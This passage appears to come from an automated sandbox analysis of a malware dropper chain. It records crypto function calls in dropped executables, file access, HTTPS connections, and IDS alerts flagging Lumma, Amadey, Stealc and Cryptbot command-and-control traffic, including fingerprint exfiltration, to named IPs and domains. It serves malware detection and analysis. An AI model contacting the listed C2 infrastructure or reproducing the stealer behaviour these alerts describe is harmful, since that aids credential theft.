                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,10_2_6BF525B0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF044C0 PK11_PubEncrypt,10_2_6BF044C0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF04440 PK11_PrivDecrypt,10_2_6BF04440
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BED4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,10_2_6BED4420
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2DA40 SEC_PKCS7ContentIsEncrypted,10_2_6BF2DA40
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF03850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,10_2_6BF03850
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF09840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,10_2_6BF09840
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF03FF0 PK11_PrivDecryptPKCS1,10_2_6BF03FF0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF29EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,10_2_6BF29EC0
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BEE7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,10_2_6BEE7D60
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeCode function: 10_2_6BF2BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,10_2_6BF2BD30
                              Source: 941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_931feee9-b
                              Source: Tii6ue74NB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49731 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49742 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49745 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49755 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49762 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49767 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49773 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49775 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.67.146:443 -> 192.168.2.4:49780 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49834 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49841 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49854 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49862 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49864 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49872 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49899 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49902 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49907 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49908 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49919 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.4:49921 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49928 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49937 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49947 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.66.85:443 -> 192.168.2.4:49957 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50206 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50209 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50210 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50211 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50212 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50215 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50217 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50218 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50219 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50222 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50223 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50224 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50227 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50229 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.67.179.109:443 -> 192.168.2.4:50235 version: TLS 1.2
                              Source: Tii6ue74NB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Binary string: mozglue.pdbP source: 3m20j.exe, 0000000A.00000002.2513931504.000000006C1BD000.00000002.00000001.01000000.0000001A.sdmp
                              Source: Binary string: wextract.pdb source: Tii6ue74NB.exe, Tii6ue74NB.exe, 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, i9z22.exe, i9z22.exe, 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, P0D95.exe, P0D95.exe, 00000002.00000000.1821282688.00000000003E1000.00000020.00000001.01000000.00000005.sdmp
                              Source: Binary string: nss3.pdb@ source: 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: wextract.pdbGCTL source: Tii6ue74NB.exe, 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, i9z22.exe, 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, P0D95.exe, 00000002.00000000.1821282688.00000000003E1000.00000020.00000001.01000000.00000005.sdmp
                              Source: Binary string: wkernel32.pdb source: ae64e67a81.exe, 00000013.00000003.2353199945.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2353306605.0000000005260000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361311629.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361403790.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wkernelbase.pdb source: ae64e67a81.exe, 00000013.00000003.2353600190.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2353783136.0000000005360000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361634003.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361824287.00000000054A0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdb source: ae64e67a81.exe, 00000013.00000003.2352326552.0000000005330000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2352114707.0000000005140000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2360262896.0000000005280000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdbUGP source: ae64e67a81.exe, 00000013.00000003.2352667375.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2352815052.00000000052E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2360875199.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361109181.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdbUGP source: ae64e67a81.exe, 00000013.00000003.2352326552.0000000005330000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2352114707.0000000005140000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2360262896.0000000005280000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdb source: ae64e67a81.exe, 00000013.00000003.2352667375.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2352815052.00000000052E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2360875199.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361109181.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: protobuf-net.pdbSHA256}Lq source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: nss3.pdb source: 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: mozglue.pdb source: 3m20j.exe, 0000000A.00000002.2513931504.000000006C1BD000.00000002.00000001.01000000.0000001A.sdmp
                              Source: Binary string: protobuf-net.pdb source: fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmp
                              Source: Binary string: wkernelbase.pdbUGP source: ae64e67a81.exe, 00000013.00000003.2353600190.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2353783136.0000000005360000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361634003.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361824287.00000000054A0000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: wkernel32.pdbUGP source: ae64e67a81.exe, 00000013.00000003.2353199945.0000000005140000.00000004.00000001.00020000.00000000.sdmp, ae64e67a81.exe, 00000013.00000003.2353306605.0000000005260000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361311629.0000000005280000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.2361403790.00000000053A0000.00000004.00000001.00020000.00000000.sdmp
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeDirectory queried: number of queries: 1001
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeDirectory queried: number of queries: 1001
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCode function: 0_2_00DF2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00DF2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCode function: 1_2_00622390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00622390
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCode function: 2_2_003E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_003E2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: chrome.exeMemory has grown: Private usage: 5MB later: 45MB

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:49442 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:64244 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49733 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49731 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49730 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49737 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49737 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49737
                              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49737 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49737
                              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49737 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49732
                              Source: Network trafficSuricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:49741 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49768 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49776 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49791 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49809 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:50902 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49828 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49834 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49854 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49851 -> 176.53.146.212:80
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49862 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49842 -> 176.53.146.212:80
                              Source: Network trafficSuricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.4:56687 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49902 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49899 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49906 -> 176.53.146.212:80
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49928 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49908 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49907 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49921 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49919 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49937 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49947 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49841 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:49872 -> 104.21.64.80:443
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49932
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49957 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2058355 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI) : 192.168.2.4:49968 -> 104.21.66.85:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49965 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50072
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:50199 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:52508 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50204
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:62809 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50207 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50206 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50209 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50210 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50211 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:65139 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50213 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50212 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50215 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50214 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50218 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50217 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50219 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50223 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50222 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50224 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50227 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50220
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50226 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50228 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50106 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50229 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50235 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:63368 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50255 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50260 -> 172.67.179.109:443
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50259 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.4:50264 -> 172.67.179.109:443
